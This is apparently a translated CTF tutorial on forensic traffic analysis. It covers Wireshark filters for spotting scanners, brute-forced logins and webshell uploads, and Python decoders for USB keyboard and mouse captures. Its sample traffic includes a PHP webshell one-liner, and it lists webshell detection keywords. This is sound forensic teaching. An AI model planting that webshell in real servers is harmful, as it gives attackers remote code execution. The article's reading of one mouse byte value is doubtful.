CTF Traffic Analysis: Classic Question Types and Problem-Solving Ideas

In CTF competitions, analyzing and forensically examining traffic packets is a very important type of challenge. Typically, these challenges provide a pcap file containing traffic data, and participants must filter out the irrelevant traffic in this file and find the flag or related clues from the key traffic.

Analysis of pcap traffic packets is usually done with the graphical network sniffer Wireshark. This sniffer has been continuously improved by numerous developers and has become one of the most widely used security tools. Dou Ge has already introduced it in previous articles. Next, Dou Ge will introduce the classic question types and problem-solving ideas in current CTF traffic analysis.

CTF question types are mainly divided into traffic packet repair, WEB traffic packet analysis, USB traffic packet analysis, and other traffic packet analysis.

Traffic packet repair

During the competition, opening the traffic packet provided by the question in Wireshark may prompt a packet anomaly, as shown in the figure below.

Repair it using an online pcap packet repair tool.

Practice

The first "Baidu Cup" Information Security Attack and Defense Finals Online Selection: find the flag
The address of the pcap file: https://static2.ichunqiu.com/icq/resources/fileupload/CTF/BSRC/2017/BSRC3-1/findtheflag.cap

WEB traffic packet analysis

WEB packet analysis questions mainly appear as analysis of WEB attack behavior. Typical WEB attack behaviors include WEB scanning, background directory brute force, background account brute force, WEBSHELL upload, SQL injection, etc.

Question type: Obtain the WEB scanning tool used by the attacker from the given traffic packet.

Problem-solving idea: Common WEB scanners include Awvs, Netsparker, Appscan, Webinspect, Rsas (NSFOCUS Aurora), Nessus, WebReaver, Sqlmap, etc.
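As an added example (not code from the original article), here is a small Python script that applies the same idea as Wireshark's "http contains" filters to reassembled HTTP requests: it looks for scanner feature strings, collects URLs that carry background-page features, and pulls out POST requests containing a keyword. The feature table, the sample requests and the IP addresses are constructed assumptions for the demonstration, not a complete fingerprint list.

```python
# Scripted counterpart of the Wireshark filters used in WEB traffic questions.
# Example code added to the article; the fingerprint table is an assumption.

# Assumed scanner feature strings (lower-case substrings; real scanners leave
# these in User-Agent headers or payloads, but the list is not exhaustive).
SCANNER_FEATURES = {
    "Awvs": ("acunetix",),
    "Netsparker": ("netsparker",),
    "Appscan": ("appscan",),
    "Nessus": ("nessus",),
    "Sqlmap": ("sqlmap",),
}

# Typical background URL features, as used with `http contains "..."`.
BACKGROUND_FEATURES = ("admin", "manage", "login")

# Constructed sample: (client_ip, reassembled HTTP request) pairs, the way
# Wireshark shows them under "Follow TCP Stream".
SAMPLE_REQUESTS = [
    ("10.0.0.5", "GET /index.php HTTP/1.1\r\nHost: target\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
    ("10.0.0.9", "GET /index.php?id=1%27 HTTP/1.1\r\nHost: target\r\n"
                 "User-Agent: sqlmap/1.3.2#stable (http://sqlmap.org)\r\n\r\n"),
    ("10.0.0.9", "GET /admin/ HTTP/1.1\r\nHost: target\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
    ("10.0.0.9", "GET /manage/ HTTP/1.1\r\nHost: target\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
    ("10.0.0.9", "GET /backend/ HTTP/1.1\r\nHost: target\r\nUser-Agent: Mozilla/5.0\r\n\r\n"),
    ("10.0.0.9", "POST /admin/login.php HTTP/1.1\r\nHost: target\r\n"
                 "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                 "username=admin&password=123456"),
    ("10.0.0.9", "POST /upload.php HTTP/1.1\r\nHost: target\r\n"
                 "Content-Type: multipart/form-data; boundary=xyz\r\n\r\n"
                 "--xyz\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.php\"\r\n\r\n"
                 "<?php eval($_POST[\"pass\"]); ?>\r\n--xyz--"),
]


def parse_request(raw):
    """Split a raw HTTP request into method, URI, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, uri, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "uri": uri, "headers": headers, "body": body, "raw": raw}


def http_contains(req, needle):
    """Like Wireshark's `http contains "x"`: case-sensitive match over the whole HTTP layer."""
    return needle in req["raw"]


def identify_scanners(requests):
    """Map scanner name -> set of client IPs whose requests carry its feature string."""
    hits = {}
    for ip, raw in requests:
        low = raw.lower()
        for name, features in SCANNER_FEATURES.items():
            if any(f in low for f in features):
                hits.setdefault(name, set()).add(ip)
    return hits


def background_urls(requests, features=BACKGROUND_FEATURES):
    """Distinct URL paths whose path contains a background feature (directory brute-force leftovers)."""
    found = set()
    for _, raw in requests:
        path = parse_request(raw)["uri"].split("?")[0]
        if any(f in path.lower() for f in features):
            found.add(path)
    return sorted(found)


def post_requests_containing(requests, *keywords):
    """Equivalent of http.request.method == "POST" && http contains "keyword"."""
    out = []
    for ip, raw in requests:
        req = parse_request(raw)
        if req["method"] == "POST" and any(http_contains(req, k) for k in keywords):
            out.append((ip, req["uri"], req["body"]))
    return out


if __name__ == "__main__":
    print("scanners:", identify_scanners(SAMPLE_REQUESTS))
    print("background URLs:", background_urls(SAMPLE_REQUESTS))
    print("login POSTs:", post_requests_containing(SAMPLE_REQUESTS, "admin"))
    print("webshell POSTs:", post_requests_containing(SAMPLE_REQUESTS, "eval", "system", "assert"))
```

The scanner check lowercases the request because feature strings appear with mixed case in practice, whereas `http_contains` stays case-sensitive to mirror Wireshark's `contains` operator (use `matches` in Wireshark when you want a case-insensitive regex).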
To identify which scanner the attacker used, filter for the scanner's feature strings in Wireshark.
Related command: http contains "scanner feature value"
Common scanner feature reference: https://www.freebuf.com/column/156291.htm

Practice

Anheng August Monthly Competition Traffic Analysis: What scanner did the hacker use?
The address of the pcap file: Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6ro

Question type: It is known that the attacker obtained the website's background address through directory brute force. Obtain the background address from the given traffic packet.

Problem-solving idea: To obtain the background address recorded in the traffic packet, filter for background URL features in Wireshark.
Related command: http contains "background URL feature"
Common background URL feature reference: https://www.freebuf.com/column/156291.html

Practice

Anheng August Monthly Competition Traffic Analysis: What is the background login address scanned by the hacker?
The address of the pcap file: Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6ro

Question type: It is known that the attacker obtained the website's background login account through brute force. Obtain the correct account information from the given traffic packet.

Problem-solving idea: A WEB account login page usually uses a POST request. To obtain the account information recorded in the traffic packet, filter for POST requests and keywords such as "admin" in Wireshark.
Related command: http.request.method == "POST" && http contains "keyword"

Practice

Anheng August Monthly Competition Traffic Analysis: What account and password did the hacker use to log in to the web background?
The address of the pcap file: Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6ro

Question type: It is known that the attacker uploaded a malicious webshell file.
Restore the content of the webshell uploaded by the attacker from the given traffic packet.

Problem-solving idea: Webshell file uploads usually use a POST request, and the file content often contains keywords such as eval, system and assert. To obtain the webshell recorded in the traffic packet, filter for POST requests and those keywords in Wireshark.
Related command: http.request.method == "POST" && http contains "keyword"

Practice

Anheng August Monthly Competition Traffic Analysis: What is the name of the webshell file uploaded by the hacker? What is its content?
The address of the pcap file: Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6ro

USB traffic packet analysis

USB traffic refers to the traffic on USB device interfaces. By monitoring USB interface traffic, an attacker can obtain keystrokes, mouse movements and clicks, plaintext communication with storage devices, the network traffic of a USB wireless network card, etc. In CTF, USB traffic analysis focuses mainly on keyboard and mouse traffic.

Keyboard traffic

The USB protocol data part is in the Leftover Capture Data field, and the data length is eight bytes. The keystroke information is concentrated in the third byte. The data is shown in the figure below.

As shown in the figure above, the keystroke information is 0x05, corresponding to the key "B".

The specific key mapping can be found in the HID Usage ID table in "USB Keyboard Protocol Key Codes": https://wenku.baidu.com/view/9050c3c3af45b307e971971e.html

Question type: The flag is hidden in USB traffic and can be recovered by converting the keyboard key codes in the USB protocol data into keystrokes.

Problem-solving idea:
1. Use the tshark command in Kali Linux to extract the capture data: tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt, then remove blank lines.
2.
Restore the data into keystrokes according to the HID Usage ID table in "USB Keyboard Protocol Key Codes".

Practice

During a penetration test of a bank card password input system, security evaluators intercepted a segment of traffic in which a 6-digit password was entered through a USB keyboard; it also contains some unrelated USB device traffic. Can you recover the 6-digit password from it? The final submitted flag format is flag.
The address of the pcap file: Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6ro
Python keyboard key code conversion script: same as above

Mouse traffic

The USB protocol mouse data part is in the Leftover Capture Data field, and the data length is four bytes.

The first byte represents the button: 0x00 means no button, 0x01 means the left button is pressed, and 0x02 means the right button is pressed. The second byte can be regarded as a signed byte, with the highest bit as the sign bit: when positive, it is the number of pixels the mouse moved to the right horizontally; when negative, the number of pixels it moved to the left. The third byte is similar to the second and represents the vertical (up or down) offset. The data is shown in the figure below.

As shown in the figure above, the data is 0x00002000, indicating that the mouse moves 20 pixels vertically upward.

Question type: The flag is hidden in USB traffic and can be recovered from the mouse movement trajectory in the USB protocol data.

Problem-solving idea:
1. Use the tshark command in Kali Linux to extract the capture data: tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt, then remove blank lines.
2.
Restore the mouse movement trajectory according to the USB protocol mouse data.

Practice

This is a mouse traffic analysis question.
The address of the pcap file: Link: https://pan.baidu.com/s/1bGEIPeXDCbhybmWOyGr8Og Extraction code: q6ro
Python mouse data conversion script: same as above

Other traffic packet analysis

In addition to conventional WEB and USB traffic, there may also be traffic such as SMTP and Telnet; its analysis is similar to WEB traffic analysis and will not be repeated here.

The above are the basic question types of traffic analysis in CTF competitions as Dou Ge understands them. Everyone is welcome to add to them.

References:
"Notes on a USB Traffic Analysis CTF Question" (记一道USB流量分析CTF题), https://blog.csdn.net/qq_36609913/article/details/78578406
CTF Wiki, https://ctf-wiki.github.io/ctf-wiki/introduction/resources/

Source: https://cloud.tencent.com/developer/article/1419465
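The keyboard and mouse sections above both end with "restore the data" from the usbdata.txt that tshark produces. As an added example (not the "same as above" scripts the article refers to), here is one Python script that does both: it reads the tshark field output, decodes 8-byte keyboard reports into typed characters (including Shift and Backspace), and decodes 4-byte mouse reports into a cursor trajectory drawn while the left button is held. The sample reports are constructed for the demonstration; the usbhid.data alternative mentioned at the end is an assumption about newer Wireshark builds.

```python
# Decoders for usbdata.txt from: tshark -r usb.pcap -T fields -e usb.capdata > usbdata.txt
# Example code added to the article. Accepts both "00:00:05:..." (older tshark)
# and "000005..." (newer tshark) hex lines; blank lines (non-USB frames) are dropped.


def read_reports(text):
    """Turn tshark field output into a list of byte strings, one per USB report."""
    reports = []
    for line in text.splitlines():
        line = line.strip().replace(":", "")
        if line:
            reports.append(bytes.fromhex(line))
    return reports


# --- keyboard: HID boot-protocol report = modifiers, reserved, key1..key6 ---
_KEYS = {i + 0x04: c for i, c in enumerate("abcdefghijklmnopqrstuvwxyz")}
_KEYS.update({i + 0x1e: c for i, c in enumerate("1234567890")})
_KEYS.update({0x28: "\n", 0x2b: "\t", 0x2c: " ", 0x2d: "-", 0x2e: "=", 0x2f: "[",
              0x30: "]", 0x31: "\\", 0x33: ";", 0x34: "'", 0x35: "`", 0x36: ",",
              0x37: ".", 0x38: "/"})
_SHIFTED = {c: c.upper() for c in "abcdefghijklmnopqrstuvwxyz"}
_SHIFTED.update(dict(zip("1234567890-=[]\\;'`,./", "!@#$%^&*()_+{}|:\"~<>?")))
BACKSPACE = 0x2a
SHIFT_MASK = 0x22          # byte 0: 0x02 = left Shift, 0x20 = right Shift


def decode_keystrokes(text):
    """Decode the third byte of each 8-byte report; reports of other sizes belong to other devices."""
    typed = []
    for rep in read_reports(text):
        if len(rep) != 8:
            continue
        key = rep[2]
        if key == 0:                       # key-release / idle report
            continue
        if key == BACKSPACE:               # apply the typist's own corrections
            if typed:
                typed.pop()
            continue
        ch = _KEYS.get(key)
        if ch is None:                     # unmapped usage ID (function keys etc.)
            continue
        typed.append(_SHIFTED.get(ch, ch) if rep[0] & SHIFT_MASK else ch)
    return "".join(typed)


# --- mouse: 4-byte report = buttons, dx, dy, wheel (dx/dy are signed) -------
def decode_mouse_path(text):
    """Return (final_x, final_y, points): cursor position and every position where the left button was held."""
    x = y = 0
    drawn = []
    for rep in read_reports(text):
        if len(rep) != 4:
            continue
        x += int.from_bytes(rep[1:2], "little", signed=True)   # high bit is the sign bit
        y += int.from_bytes(rep[2:3], "little", signed=True)
        if rep[0] & 0x01:
            drawn.append((x, y))
    return x, y, drawn


def render(points, scale=5):
    """ASCII raster of the drawn points; rows grow downward, flip if the picture looks mirrored."""
    if not points:
        return ""
    xs = [p[0] // scale for p in points]
    ys = [p[1] // scale for p in points]
    x0, y0 = min(xs), min(ys)
    grid = [[" "] * (max(xs) - x0 + 1) for _ in range(max(ys) - y0 + 1)]
    for px, py in zip(xs, ys):
        grid[py - y0][px - x0] = "#"
    return "\n".join("".join(row) for row in grid)


# Constructed keyboard sample: keys f l a g { U s b 2 <Backspace> 1 }, with one
# all-zero release report and one 4-byte mouse report mixed in as noise.
SAMPLE_KEYBOARD = """\
00:00:09:00:00:00:00:00
00:00:0f:00:00:00:00:00
00:00:04:00:00:00:00:00
00:00:0a:00:00:00:00:00
02:00:2f:00:00:00:00:00
00:00:00:00:00:00:00:00
20:00:18:00:00:00:00:00
00:00:16:00:00:00:00:00
00:00:05:00:00:00:00:00
00002000
00:00:1f:00:00:00:00:00
00:00:2a:00:00:00:00:00
00:00:1e:00:00:00:00:00
02:00:30:00:00:00:00:00
"""

# Constructed mouse sample: an "L" drawn with the left button held, then a
# release with a leftward move, a stray keyboard report and a right click.
SAMPLE_MOUSE = """\
00000000
01000000
01000500
01000500
01050000
01050000
00fb0000
0000050000000000
02000000
"""

if __name__ == "__main__":
    print(decode_keystrokes(SAMPLE_KEYBOARD))        # flag{Usb1}
    _, _, pts = decode_mouse_path(SAMPLE_MOUSE)
    print(render(pts))
```

To run it on a real capture, replace the samples with `open("usbdata.txt").read()`. If tshark prints nothing for `usb.capdata` because the Wireshark build dissects the HID reports, `-e usbhid.data` supplies the same bytes (an assumption about newer releases, not something the article states).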